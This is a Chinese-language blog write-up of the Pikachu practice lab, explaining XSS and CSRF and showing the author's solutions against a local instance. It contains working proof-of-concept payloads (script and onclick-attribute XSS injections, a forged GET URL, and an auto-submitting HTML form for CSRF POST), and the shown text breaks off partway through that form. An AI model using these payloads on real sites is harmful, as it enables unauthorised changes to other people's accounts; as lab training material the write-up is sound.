<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="stackTang"/><meta name="copyright" content="stackTang"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="CTF,学习,靶场"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="pikachu靶场通关 | stackTang Blog"/><meta name="apple-mobile-web-app-title" content="pikachu靶场通关 | stackTang Blog"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="http://example.com/2026/06/22/pikachu靶场通关/"/><meta name="description" content="711日志pikach通关暴力破解Cross-Site ScriptingXSS（跨站脚本）概述 XSS是一种发生在Web前端的漏洞，所以其危害的对象主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击，前端js挖矿，获取用户cookie，甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等  跨站脚本漏洞类型及测试流程跨站脚本漏洞常见类型 反射型交互的数据一般不会被存在数据库里面，一次性，一般...">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu靶场通关 | stackTang Blog">
<meta property="og:url" content="http://example.com/2026/06/22/pikachu%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/index.html">
<meta property="og:site_name" content="stackTang Blog">
<meta property="og:description" content="711日志pikach通关暴力破解Cross-Site ScriptingXSS（跨站脚本）概述 XSS是一种发生在Web前端的漏洞，所以其危害的对象主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击，前端js挖矿，获取用户cookie，甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等  跨站脚本漏洞类型及测试流程跨站脚本漏洞常见类型 反射型交互的数据一般不会被存在数据库里面，一次性，一般...">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2026/06/22/pikachu%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/assets/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2026-06-22T12:48:39.000Z">
<meta property="article:modified_time" content="2026-06-22T13:01:42.260Z">
<meta property="article:author" content="stackTang">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="学习">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2026/06/22/pikachu%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/assets/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>pikachu靶场通关 | stackTang Blog</title><link rel="shortcut icon" href="/assets/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">

<link rel="stylesheet" href="/css/third-party/dist/waline.css">

<link rel="stylesheet" href="/css/third-party/dist/APlayer.min.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 8.1.2"></head><body bg-style="none"><div class="post-progressbar-container"><div class="post-progressbar"></div></div><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="主页"><div>stackTang Blog</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"><div class="menu-item"><a href="javascript:void(0);"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>文章</span></a><ul class="sub-menu-item"><li><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></li><li><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></li></ul></div><div class="menu-item"><a href="/friends"><img src="/assets/images/svg/uc/uc-friend.svg" class="icon noview" alt="Icon"><span>friend</span></a></div><div class="menu-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></div></div><div id="nav-function"><div id="search-btn"><a href="javascript:void(0);" title="搜索" accesskey="s"><img src="/assets/images/svg/uc/uc-search.svg" class="icon noview" alt="Icon"><span>搜索</span></a></div><div id="menu-btn"><a href="javascript:void(0);" title="打开菜单"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="主页">stackTang Blog</a></div><div class="menu-aside-item"><a href="javascript:void(0);"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>文章</span></a><ul class="menu-aside-sub-item"><li><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></li><li><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></li></ul></div><div class="menu-aside-item"><a href="/friends"><img src="/assets/images/svg/uc/uc-friend.svg" class="icon noview" alt="Icon"><span>friend</span></a></div><div class="menu-aside-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">StackTang の 站</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">pikachu靶场通关</h1><div class="post-author"><span>作者: stackTang</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>发表于2026-06-22</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>更新于2026-06-22</span></div></div><div class="post-read"></div></div><div class="post-attribute"><div class="post-tags"><img src="/assets/images/svg/ta/ta-tag.svg" class="icon noview" alt="Icon"><span><a class="post-tags-link" href="/tags/CTF/" rel="tag">CTF</a><a class="post-tags-link" href="/tags/%E5%AD%A6%E4%B9%A0/" rel="tag">学习</a><a class="post-tags-link" href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag">靶场</a></span></div></div></div><div class="post markdown" indent="false"><h1 id="711日志"><a href="#711日志" class="headerlink" title="711日志"></a>711日志</h1><h2 id="pikach通关"><a href="#pikach通关" class="headerlink" title="pikach通关"></a>pikach通关</h2><h3 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h3><h3 id="Cross-Site-Scripting"><a href="#Cross-Site-Scripting" class="headerlink" title="Cross-Site Scripting"></a>Cross-Site Scripting</h3><h4 id="XSS（跨站脚本）概述"><a href="#XSS（跨站脚本）概述" class="headerlink" title="XSS（跨站脚本）概述"></a>XSS（跨站脚本）概述</h4><ul>
<li>XSS是一种发生在Web前端的漏洞，所以其危害的对象主要是前端用户。</li>
<li>XSS漏洞可以用来进行钓鱼攻击，前端js挖矿，获取用户cookie，甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/2309ef705069433999f389a45a7f21c9.png" ></li>
</ul>
<h4 id="跨站脚本漏洞类型及测试流程"><a href="#跨站脚本漏洞类型及测试流程" class="headerlink" title="跨站脚本漏洞类型及测试流程"></a>跨站脚本漏洞类型及测试流程</h4><h4 id="跨站脚本漏洞常见类型"><a href="#跨站脚本漏洞常见类型" class="headerlink" title="跨站脚本漏洞常见类型"></a>跨站脚本漏洞常见类型</h4><ul>
<li>反射型<br>交互的数据一般不会被存在数据库里面，一次性，一般出现在查询类等页面。</li>
<li>存储型<br>交互的数据被存储在数据库里，永久性存储，一般出现在留言板，注册类等页面。</li>
<li>DOM型<br>不与后台服务器产生数据交互，通过DOM操作前端代码 输出的时候产生的问题，一次性，也属于反射型。</li>
</ul>
<h4 id="XSS漏洞形成的原因："><a href="#XSS漏洞形成的原因：" class="headerlink" title="XSS漏洞形成的原因："></a>XSS漏洞形成的原因：</h4><p>主要原因是程序对输入和输出控制不够严格，导致“精心构造”的脚本输入后，在输出到前端时被浏览器当作有效代码解析执行而产生的危害。</p>
<h4 id="跨站脚本漏洞测试流程"><a href="#跨站脚本漏洞测试流程" class="headerlink" title="跨站脚本漏洞测试流程"></a>跨站脚本漏洞测试流程</h4><ol>
<li>在目标站点找到输入点，比如查询接口，留言板等；</li>
<li>输入一组“特殊字符+唯一识别字符”，点击提交后，查看返回的源码，是否有做对应的处理。</li>
<li>通过搜索定位到唯一字符，结合唯一字符前后语法确认是否可以构造执行JS代码的条件（构造闭合）；</li>
<li>提交payload，成功执行则存在xss漏洞。</li>
</ol>
<h4 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h4><ol>
<li>一般查询接口易出现反射型xss，留言板易出现存储型xss。</li>
<li>后台可能存在过滤措施，构造的script可能会被过滤掉，从而无法生效。</li>
<li>通过变化不同的script，尝试绕过后台过滤机制。</li>
</ol>
<h4 id="反射型XSS（get）"><a href="#反射型XSS（get）" class="headerlink" title="反射型XSS（get）"></a>反射型XSS（get）</h4><ul>
<li>构造payload：<code>&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;</code></li>
<li>我们发现输入时长度进行了限制，F12进行进行修改<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/c0903848b0e447afb90597ee2c79c7bf.png" ><br>输入完整的payload<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/1d6901d007ae4002985d6025497672a7.png" ></li>
</ul>
<h4 id="反射型XSS（post）"><a href="#反射型XSS（post）" class="headerlink" title="反射型XSS（post）"></a>反射型XSS（post）</h4><ul>
<li>我们点击右上角的“点一下提示”<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/1d329f3416df4137b2b6c025a48f12b7.png" ></li>
<li>输入用户名和密码之后来到此页面，输入payload<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/9a44292a21c34798a5f5c3054ceaee41.png" ></li>
<li>点击提交即可看到注入成功。<br><code>两者区别：get型提交的数据会显示在url中，而post不会。</code><br>由于前两关较简单我们直接输入payload就可以注入成功，就没有按照上述所说的流程进行特殊字符尝试，查看是否进行了过滤，然后构造新的payload。</li>
</ul>
<h4 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h4><ul>
<li>payload:<code>&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</code><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/1ace7620fef04381926721699e999532.png" ></li>
<li>在留言板中输入Do you love me？<br>点击确定我们依然会看到出现弹窗，而且我们可以看到留言列表发现进行了存储。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/b7896b5ae4274e6a9806a8ebe1f33d7f.png" ><br>不仅如此，我们进行页面切换，然后再次切换回来，发现弹窗依然存在，说明我们输入的语句已经被存储起来。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/93f85838f7774bdfaf367cf69cb2147f.png" ><br>这就是存储性与反射性永久性和一次性的区别，会永久的存储在数据库中。</li>
</ul>
<h4 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h4><p>什么是DOM：<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/dfec3ca772584262ae3b13712c070773.png" ><br>通过JavaScript,可以重构整个HTML文档。您可以添加、移除、改变或重排页面上的项目。要改变页面的某个东西，JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口，连同对HTML元素进行添加、移动、改变或移除的方法和属性，都是通过文档对象模型来获得的(DOM)所以，你可以把DOM理解为JS访问HTML的标准编程接口。DOM是纯前端的操作</p>
<ul>
<li>先输入11111进行测试<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/fcecd0856bb749479cc1b9b74cc02571.png" ></li>
<li>click me！ 后查看查看网页源码，ctrl+f搜索 what do you see 定位。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>首先你要能看懂代码，然后就可以明白我们输入框中的内容就是标注的str，我们可以在这里构造一个闭合，实现弹窗</li>
</ul>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&#x27;&quot;+str+&quot;&#x27;</span>&gt;</span>what do you see?<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>输入框中输入：</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onclick=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>构造之后的完成语句：</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&#x27;&#x27;</span> <span class="attr">onclick</span>=<span class="string">&quot;alert(‘xss’)&quot;</span>&gt;</span>&#x27;&gt;what do you see?<span class="tag">&lt;/<span class="name">a</span>&gt;</span> </span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>输入后点击click me 后，点击 what do you see 便会弹窗了。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/2103c97c9e6d435281fcf902ea89acac.png" ></p>
<h4 id="DOM型XSS-X"><a href="#DOM型XSS-X" class="headerlink" title="DOM型XSS-X"></a>DOM型XSS-X</h4><p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/737c70dde01948f79315b31331961bcb.png" ><br>与上一关的区别就是这次是从url中获取我们输入的text参数的，这就类似反射型，其他同上，构造闭合即可。<br>输入框中输入：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onclick=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/5bb6e48486d34435aaf4cce35a70e2e9.png" ><br>由于dom型是纯前端操作，比较鸡肋。</p>
<h3 id="CSRF-跨站请求伪造漏洞"><a href="#CSRF-跨站请求伪造漏洞" class="headerlink" title="CSRF(跨站请求伪造漏洞)"></a>CSRF(跨站请求伪造漏洞)</h3><h4 id="CSRF漏洞概述"><a href="#CSRF漏洞概述" class="headerlink" title="CSRF漏洞概述"></a>CSRF漏洞概述</h4><p>Cross-site request forgrey简称为”CSRF”。<br>在CSRF的攻击场景中攻击者会伪造一个请求（这个请求一般是一个链接）<br>然后欺骗目标用户进行点击，用户一旦点击这个请求，整个攻击也就完成了。<br>因此CSRF攻击也被称为”one click”攻击。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/07d3e209edcd4769a2cce0ff54f2c881.png" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/26e7e420a2a443769a34a3128d73dab8.png" ></p>
<blockquote>
<p>为什么小黑可以攻击成功呢？<br>条件1：xxx购物网站没有对个人信息修改的请求进行防CSRF处理，导致该请求容易被伪造。因此，我们判断一个网站是否存在CSRF漏洞，其实就是判断其对关键信息（比如密码等敏感信息）的操作（增删改）是否容易被伪造。<br>条件2：lucy在登录了后台的情况下，点击了小黑发送的“埋伏”链接。如果lucy不在登录状态下，或者没有点击这个恶意链接，则攻击就不会成功。</p>
</blockquote>
<h4 id="为什么会出现CSRF漏洞"><a href="#为什么会出现CSRF漏洞" class="headerlink" title="为什么会出现CSRF漏洞*"></a>为什么会出现CSRF漏洞*</h4><p>一方面，用户安全意识不足，访问不知名的url<br>另一方面，web没有做到准确的合法用户验证</p>
<h5 id="CSRF与XSS的区别"><a href="#CSRF与XSS的区别" class="headerlink" title="CSRF与XSS的区别"></a>CSRF与XSS的区别</h5><p>CSRF是借用户的权限完成攻击，攻击者并没有拿到用户的权限，而XSS可以通过盗取cookie来直接获取用户权限来实施攻击。</p>
<h5 id="如何确认一个web系统存在csrf漏洞"><a href="#如何确认一个web系统存在csrf漏洞" class="headerlink" title="如何确认一个web系统存在csrf漏洞"></a>如何确认一个web系统存在csrf漏洞</h5><p>1、对目标网站增删改的地方进行标记，并观察其逻辑，判断请求是否可以被伪造</p>
<ul>
<li>例如：修改管理员账号时，并不需要验证旧密码，导致请求容易被伪造</li>
<li>例如：对于敏感信息的修改并没有使用安全的token验证，导致请求容易被伪造</li>
</ul>
<p>2、确认凭证的有效期（这个问题会提高CSRF被利用的概率）<br>虽然退出或者关闭了浏览器，但cookie仍然有效，或者session并没有过期，导致CSRF攻击变得简单。</p>
<h3 id="CSRF-GET"><a href="#CSRF-GET" class="headerlink" title="CSRF(GET)"></a>CSRF(GET)</h3><ul>
<li>使用提示的用户名和密码进行登录<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/b9ab24fe02644b6589b705cbe62f7ee5.png" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/c34aa7d86326450187f94cc882f85143.png" ></li>
<li>点击修改个人信息，提交并使用bp抓包<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/6702378d18c24741b37c2b4edf983f54.png" ><br>这是我们提交的请求：</li>
</ul>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=%E7%94%B7&amp;phonenum=11111111&amp;add=%E5%8C%97%E4%BA%AC&amp;email=222222&amp;submit=submit</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>我们并没有看到CSRF的token，说明没有防CSRF的措施。<br>修改get请求，我们将phonenum修改为521521，然后补全url并发送给被攻击者</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=%E7%94%B7&amp;phonenum=521521&amp;add=%E5%8C%97%E4%BA%AC&amp;email=222222&amp;submit=submit</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>如果被攻击者此时登录状态或cookie&#x2F;session没有过期，则她的信息被修改<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/b1f6b6bf75e445dd9968ece59a5d37cd.png" ></p>
<h3 id="CSRF-PSOT"><a href="#CSRF-PSOT" class="headerlink" title="CSRF(PSOT)"></a>CSRF(PSOT)</h3><p>同上登录后进行抓包<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/5c2439c5c70943c8858c27a5f21e7168.png" ><br>post型，因为是请求体，不能在url中，所以无法再使用上述办法（即通过URL来伪造请求)进行修改。<br>但是我们可以根据抓包所获取的信息自己构造一个表单<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/67e18d97d3c447a48d17ddcb302a21a5.png" ><br>构造表单<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/e25d82a5ba104105a63dfd413ac397cc.png" ><br>代码如下：</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;X-UA-Compatible&quot;</span> <span class="attr">content</span>=<span class="string">&quot;IE=edge&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width, initial-scale=1.0&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>csrf_post<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">window</span>.<span class="property">onload</span> = <span class="keyword">function</span>(<span class="params"></span>)&#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;postsubmit&quot;</span>).<span class="title function_">click</span>();</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;http://localhost/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;sex&quot;</span> <span class="attr">value</span>=<span class="string">&quot;1&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;phonenum&quot;</span> <span class="attr">value</span>=<span class="string">&quot;HypeRong&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span 